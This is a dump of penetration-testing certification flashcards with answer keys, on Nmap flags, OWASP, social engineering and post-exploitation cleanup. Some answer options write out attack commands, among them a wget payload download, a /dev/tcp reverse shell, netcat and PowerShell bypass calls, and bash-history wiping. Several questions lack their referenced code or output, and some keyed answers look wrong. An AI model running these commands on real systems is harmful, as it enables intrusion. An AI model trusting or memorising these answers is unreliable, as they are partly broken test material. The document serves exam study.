Dump 1 Flashcards
Which of the following commands will allow a penetration tester to permit a shell script to be
executed by the file owner?
A.
chmod u+x script.sh
B.
chmod u+e script.sh
C.
chmod o+e script.sh
D.
chmod o+x script.sh
Answer: A
A penetration tester gains access to a system and establishes persistence, and then run the
following commands:
Which of the following actions is the tester MOST likely performing?
A.
Redirecting Bash history to /dev/null
B.
Making a copy of the user’s Bash history to further enumeration
C.
Covering tracks by clearing the Bash history
D.
Making decoy files on the system to confuse incident responders
Answer: C
A compliance-based penetration test is primarily concerned with:
A.
obtaining PII from the protected network.
B.
bypassing protection on edge devices.
C.
determining the efficacy of a specific set of security standards.
D.
obtaining specific information from the protected network.
Answer: C
A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal
counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?
A.
Understanding the tactics of a security intrusion can help disrupt them.
B.
Scripts that are part of the framework can be imported directly into SIEM tools.
C.
The methodology can be used to estimate the cost of an incident better.
D.
The framework is static and ensures stability of a security program over time.
Answer: A
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A.
The most critical risks of web applications
B.
A list of all the risks of web applications
C.
The risks defined in order of importance
D.
A web-application security standard
E.
A risk-governance and compliance framework
F.
A checklist of Apache vulnerabilities
Answer: A,D
A penetration tester discovered a vulnerability that provides the ability to upload to a path via
discovery traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected
machine?
A.
Edit the discovered file with one line of code for remote callback.
B.
Download .pl files and look for usernames and passwords.
C.
Edit the smb.conf file and upload it to the server.
D.
Download the smb.conf file and look at configurations.
Answer: A
A company obtained permission for a vulnerability scan from its cloud service provider and now
wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?
A.
Whether sensitive client data is publicly accessible
B.
Whether the connection between the cloud and the client is secure
C.
Whether the client’s employees are trained properly to use the platform
D.
Whether the cloud applications were developed using a secure SDLC
Answer: B
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target
machine for execution?
A.
nc 10.10.51.50 9891 < exploit
B.
powershell -exec bypass -f \10.10.51.50\9891
C.
bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D.
wget 10.10.51.50:9891/exploit
Answer: D
A penetration tester was able to gain access to a system using an exploit. The following is a
snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?
A.
grep -v apache ~/bash_history > ~/.bash_history
B.
rm -rf /tmp/apache
C.
chmod 600 /tmp/apache
D.
taskkill /IM “apache? /F
Answer: B
Which of the following is MOST important to include in the final report of a static applicationsecurity
test that was written with a team of application developers as the intended audience?
A.
Executive summary of the penetration-testing methods used
B.
Bill of materials including supplies, subcontracts, and costs incurred during assessment
C.
Quantitative impact assessments given a successful software compromise
D.
Code context for instances of unsafe typecasting operations
Answer: D
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are
present.
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness
level of the company’s employees.
Which of the following tools can help the tester achieve this goal?
A.
Metasploit
B.
Hydra
C.
SET
D.
WPScan
Answer: C
Which of the following is the MOST common vulnerability associated with IoT devices that are
directly connected to the Internet?
A.
Unsupported operating systems
B.
Susceptibility to DDoS attacks
C.
Inability to network
D.
The existence of default passwords
Answer: D
Which of the following describes the reason why a penetration tester would run the command
sdelete mimikatz. * on a Windows server that the tester compromised?
A.
To remove hash-cracking registry entries
B.
To remove the tester-created Mimikatz account
C.
To remove tools from the server
D.
To remove a reverse shell from the system
Answer: C
A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a
potential attacker?
A.
nmap 192.168.1.1-5 -PU22-25,80
B.
nmap 192.168.1.1-5 -PA22-25,80
C.
nmap 192.168.1.1-5 -PS22-25,80
D.
nmap 192.168.1.1-5 -Ss22-25,80
Answer: D
A penetration tester was brute forcing an internal web server and ran a command that produced
the following output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a
blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?
A.
The HTTP port is not open on the firewall.
B.
The tester did not run sudo before the command.
C.
The web server is using HTTPS instead of HTTP.
D.
This URI returned a server error
Answer: D
A penetration tester was conducting a penetration test and discovered the network traffic was no
longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing
on the penetration tester’s IP address.
Which of the following MOST likely describes what happened?
A.
The penetration tester was testing the wrong assets.
B.
The planning process failed to ensure all teams were notified.
C.
The client was not ready for the assessment to start.
D.
The penetration tester had incorrect contact information.
Answer: B
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to
run WPScan and SQLmap to identify vulnerabilities and additional information about those
systems.
Which of the following is the penetration tester trying to accomplish?
A.
Uncover potential criminal activity based on the evidence gathered.
B.
Identify all the vulnerabilities in the environment.
C.
Limit invasiveness based on scope.
D.
Maintain confidentiality of the findings.
Answer: B
A company hired a penetration tester to do a social-engineering test against its employees.
Although the tester did not find any employees’ phone numbers on the company’s website, the
tester has learned the complete phone catalog was published there a few months ago.
In which of the following places should the penetration tester look FIRST for the employees’
numbers?
A.
Web archive
B.
GitHub
C.
File metadata
D.
Underground forums
Answer: A
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux
server that has an SSHD running.
Which of the following would BEST support this task?
A.
Run nmap with the -O, -p22, and -sC options set against the target.
B.
Run nmap with the -sV and -p22 options set against the target.
C.
Run nmap with the –script vulners option set against the target.
D.
Run nmap with the -sA option set against the target.
Answer: C
A penetration tester completed a vulnerability scan against a web server and identified a single but
severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?
A.
Run another scanner to compare.
B.
Perform a manual test on the server.
C.
Check the results on the scanner.
D.
Look for the vulnerability online.
Answer: B
A penetration tester has been given eight business hours to gain access to a client’s financial
system.
Which of the following techniques will have the HIGHEST likelihood of success?
A.
Attempting to tailgate an employee who is going into the client’s workplace
B.
Dropping a malicious USB key with the company’s logo in the parking lot
C.
Using a brute-force attack against the external perimeter to gain a foothold
D.
Performing spear phishing against employees by posing as senior management
Answer: D
A company’s Chief Executive Officer has created a secondary home office and is concerned that
the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the
security of the WiFi’s router.
Which of the following is MOST vulnerable to a brute-force attack?
A.
WPS
B.
WPA2-EAP
C.
WPA-TKIP
D.
WPA2-PSK
Answer: A
A penetration tester writes the following script:
Which of the following objectives is the tester attempting to achieve?
A.
Determine active hosts on the network.
B.
Set the TTL of ping packets for stealth.
C.
Fill the ARP table of the networked devices.
D.
Scan the system on the most used ports.
Answer: A